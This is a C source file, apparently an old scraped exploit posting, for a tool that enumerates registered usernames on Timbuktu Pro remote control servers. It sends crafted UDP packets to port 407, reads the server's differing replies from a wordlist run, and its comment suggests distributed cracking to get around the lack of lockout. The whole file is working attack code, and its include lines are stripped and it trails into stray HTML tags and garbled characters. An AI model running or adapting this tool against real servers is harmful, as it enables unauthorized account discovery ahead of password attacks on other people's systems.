/* Timbuktu Pro Remote Control Program - Registered User Guessing Tool by Conehead 03/05 bruteforce registered usernames against target Timbuktu remote control server PLU database classic bone-headed mistake of a program differentiating between bad usernames and passwords leads to this type of thing usernames are not case-sensitive and run from 1 to 31 characters there are no registered user account lockouts, but server does log attempts compile: gcc usage: timbuktu_userbrute [] example: timbuktu_userbrute 127.0.0.1 usernames.txt 1 Note: It appears that running with more than one simultaneous connection causes confusion and produces false negatives. Run at your own risk! Might try running singles in a distributed cracking cluster fashion. */ #include #include #include #include #include #include #include #include #define SERV_HOST_PORT 407 #define MAXMESSLEN 2048 #define MAXUSERNAMELEN 31 /* functions: void UDP_handshake(int*,struct sockaddr_in) void timbuktu_cred_exchange(int*,int,char*) void timbuktu_cli(int*,struct sockaddr_in,char*) */ UDP_handshake(sockfd,serv_addr) register int *sockfd; struct sockaddr_in serv_addr; { close(*sockfd); if ((*sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("Client: can't open datagram socket"); exit(-1); } if (connect(*sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) { perror("Client: can't connect to server"); exit(-1); } } timbuktu_cred_exchange(sockfd, username_len, username) register int sockfd; int username_len; char username[MAXUSERNAMELEN]; { char message[MAXMESSLEN]; char hex_value[4]; bcopy("\x00\x23\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00",message,24); switch (username_len) { case 1: strcpy(hex_value,"\x01"); break; case 2: strcpy(hex_value,"\x02"); break; case 3: strcpy(hex_value,"\x03"); break; case 4: strcpy(hex_value,"\x04"); break; case 5: strcpy(hex_value,"\x05"); break; case 6: strcpy(hex_value,"\x06"); break; case 7: strcpy(hex_value,"\x07"); break; case 8: strcpy(hex_value,"\x08"); break; case 9: strcpy(hex_value,"\x09"); break; case 10: strcpy(hex_value,"\x0a"); break; case 11: strcpy(hex_value,"\x0b"); break; case 12: strcpy(hex_value,"\x0c"); break; case 13: strcpy(hex_value,"\x0d"); break; case 14: strcpy(hex_value,"\x0e"); break; case 15: strcpy(hex_value,"\x0f"); break; case 16: strcpy(hex_value,"\x10"); break; case 17: strcpy(hex_value,"\x11"); break; case 18: strcpy(hex_value,"\x12"); break; case 19: strcpy(hex_value,"\x13"); break; case 20: strcpy(hex_value,"\x14"); break; case 21: strcpy(hex_value,"\x15"); break; case 22: strcpy(hex_value,"\x16"); break; case 23: strcpy(hex_value,"\x17"); break; case 24: strcpy(hex_value,"\x18"); break; case 25: strcpy(hex_value,"\x19"); break; case 26: strcpy(hex_value,"\x1a"); break; case 27: strcpy(hex_value,"\x1b"); break; case 28: strcpy(hex_value,"\x1c"); break; case 29: strcpy(hex_value,"\x1d"); break; case 30: strcpy(hex_value,"\x1e"); break; case 31: strcpy(hex_value,"\x1f"); } bcopy(hex_value,message+24,1); bcopy("\x00\x00\x00\x00\x00\x00\x00",message+25,7); bcopy("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",message+32,16); bcopy("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",message+48,16); bcopy(username,message+25,username_len); if (sendto(sockfd, message, 25+username_len, 0, NULL, 0) < 25+username_len) { perror("Client: sendto error on socket"); exit(-1); } if (recvfrom(sockfd, message, 36, 0, NULL, 0) < 36) { perror("Client: recvfrom error"); exit(-1); } if (bcmp(message+3,"\xb7",1) == 0) { printf("%s is an existing username on the Timbuktu server!\n",username); } } timbuktu_cli(sockfd,serv_addr,username) register int *sockfd; struct sockaddr_in serv_addr; char username[MAXUSERNAMELEN]; { int username_len; UDP_handshake(sockfd,serv_addr); username_len=strlen(username); timbuktu_cred_exchange(*sockfd,username_len,username); } main(argc, argv) int argc; char *argv[]; { char *host_address; struct in_addr *ptr; struct hostent *hostptr; int port_number = SERV_HOST_PORT; char user[40]; char username[MAXUSERNAMELEN+1]; int sockfd; struct sockaddr_in cli_addr, serv_addr; FILE *fileptr; int num_connects=1; int child=0; int id; int status; if (argc > 1) { host_address = argv[1]; if (*host_address >= '0' && *host_address <= '9') { ; } else { hostptr = gethostbyname(host_address); if (hostptr == NULL) { perror("gethostby error"); exit(-1); } switch (hostptr->h_addrtype) { case AF_INET: ptr = (struct in_addr *) *hostptr->h_addr_list; host_address = inet_ntoa(*ptr); break; default: perror("unknown address type"); exit(-1); } } } bzero((char *) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = inet_addr(host_address); serv_addr.sin_port = htons(port_number); if (argc >3) { num_connects=atoi(argv[3]); } if (argc >2) { fileptr = fopen(argv[2],"r"); if (fileptr == NULL) { perror("fopen error"); exit(-1); } while (fgets(user,40,fileptr)) { if (strlen(user) < MAXUSERNAMELEN+2) { child++; bcopy("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",username,MAXUSERNAMELEN+1); strncpy(username,user,strlen(user)-1); id = fork(); if (id < 0) { perror("An error occurred spawning the child"); exit(-1); } if (id == 0) { timbuktu_cli(&sockfd,serv_addr,username); exit(0); } if (child==num_connects) { wait(&status); child=0; } } } close(sockfd); } exit(0); }
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß